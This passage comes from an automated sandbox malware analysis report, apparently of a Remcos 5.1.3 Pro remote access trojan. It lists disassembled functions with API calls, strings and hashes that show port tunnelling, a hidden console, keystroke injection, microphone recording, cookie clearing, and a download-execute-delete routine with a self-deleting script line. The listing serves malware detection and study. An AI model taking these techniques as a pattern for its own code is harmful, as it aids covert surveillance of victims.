                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                          • _free.LIBCMT ref: 00445515
                                                                                          • _free.LIBCMT ref: 0044552E
                                                                                          • _free.LIBCMT ref: 00445560
                                                                                          • _free.LIBCMT ref: 00445569
                                                                                          • _free.LIBCMT ref: 00445575
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                          • String ID: C
                                                                                          • API String ID: 1679612858-1037565863
                                                                                          • Opcode ID: dc70f5935c4cadc04478971efa28b20dbce750eb1dc69c9fe13c760ed60cdc29
                                                                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                          • Opcode Fuzzy Hash: dc70f5935c4cadc04478971efa28b20dbce750eb1dc69c9fe13c760ed60cdc29
                                                                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                          Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: tcp$udp
                                                                                          • API String ID: 0-3725065008
                                                                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                          Function 00411530 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Eventinet_ntoa
                                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                          • API String ID: 3578746661-168337528
                                                                                          • Opcode ID: c7f8161b1059d753f30ac63477e8785a79ccdfa97665b3063efb0bf321f4031e
                                                                                          • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                          • Opcode Fuzzy Hash: c7f8161b1059d753f30ac63477e8785a79ccdfa97665b3063efb0bf321f4031e
                                                                                          • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                          Function 00417D1A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                          • String ID: <$@$Temp
                                                                                          • API String ID: 1704390241-1032778388
                                                                                          • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                                          • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                          • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                                          • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                          Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                          • String ID: .part
                                                                                          • API String ID: 1303771098-3499674018
                                                                                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                          Function 0041CE2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Console$Window$AllocOutputShow
                                                                                          • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                                                          • API String ID: 4067487056-2212855755
                                                                                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                          Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                          • __freea.LIBCMT ref: 0044AEB0
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • __freea.LIBCMT ref: 0044AEB9
                                                                                          • __freea.LIBCMT ref: 0044AEDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3864826663-0
                                                                                          • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                          • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                          Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendInput.USER32 ref: 00419A25
                                                                                          • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InputSend$Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 1167301434-0
                                                                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                          Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16_free
                                                                                          • String ID: a/p$am/pm$h{D
                                                                                          • API String ID: 2936374016-2303565833
                                                                                          • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                          • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                          Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • _free.LIBCMT ref: 00444E87
                                                                                          • _free.LIBCMT ref: 00444E9E
                                                                                          • _free.LIBCMT ref: 00444EBD
                                                                                          • _free.LIBCMT ref: 00444ED8
                                                                                          • _free.LIBCMT ref: 00444EEF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$AllocateHeap
                                                                                          • String ID: KED
                                                                                          • API String ID: 3033488037-2133951994
                                                                                          • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                          • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                          Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                          • __fassign.LIBCMT ref: 0044B4F9
                                                                                          • __fassign.LIBCMT ref: 0044B514
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                          Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                          • _wcslen.LIBCMT ref: 0041B7F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                          • API String ID: 3286818993-122982132
                                                                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                          Function 00401D0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _strftime.LIBCMT ref: 00401D50
                                                                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                          • String ID: %Y-%m-%d %H.%M$.wav
                                                                                          • API String ID: 3809562944-3597965672
                                                                                          • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                          • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                          • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                          • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                          Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                          • API String ID: 1133728706-4073444585
                                                                                          • Opcode ID: de9f701630c3dbd9a8930b65653e0c0cdde26806c4295527bb8ee77c550589ac
                                                                                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                          • Opcode Fuzzy Hash: de9f701630c3dbd9a8930b65653e0c0cdde26806c4295527bb8ee77c550589ac
                                                                                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                          Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                          • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                          Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                                                          • String ID: xpF
                                                                                          • API String ID: 1852769593-354647465
                                                                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                          Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                          • _free.LIBCMT ref: 00450FC8
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 00450FD3
                                                                                          • _free.LIBCMT ref: 00450FDE
                                                                                          • _free.LIBCMT ref: 00451032
                                                                                          • _free.LIBCMT ref: 0045103D
                                                                                          • _free.LIBCMT ref: 00451048
                                                                                          • _free.LIBCMT ref: 00451053
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
